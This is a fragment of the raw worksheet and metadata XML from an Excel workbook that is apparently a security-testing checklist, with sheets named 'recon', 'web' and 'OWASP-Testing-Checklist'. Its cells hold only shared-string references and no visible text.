    <sheetView workbookViewId="0">
      <selection sqref="A1:C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="2" max="2" width="26.7109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A1" s="46" t="s">
        <v>550</v>
      </c>
      <c r="B1" s="46"/>
      <c r="C1" s="46"/>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.25">
      <c r="B2" t="s">
        <v>551</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="B3" t="s">
        <v>552</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="B4" t="s">
        <v>553</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03730-CD11-476A-A75D-A5C938E3B8B6}">
  <dimension ref="A1:A19"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="B19" sqref="B19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="11" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>555</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>557</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>558</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>559</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>561</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>562</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>563</v>
      </c>
    </row>
    <row r="11" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>564</v>
      </c>
    </row>
    <row r="12" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>565</v>
      </c>
    </row>
    <row r="13" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="14" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>567</v>
      </c>
    </row>
    <row r="15" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="16" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>569</v>
      </c>
    </row>
    <row r="17" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A17" t="s">
        <v>570</v>
      </c>
    </row>
    <row r="18" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="19" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1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recon</vt:lpstr>
      <vt:lpstr>web</vt:lpstr>
      <vt:lpstr>OWASP-Testing-Checklist</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sudoninja</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-02T02:36:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-25T17:30:09Z</dcterms:modified>
</cp:coreProperties>
</file>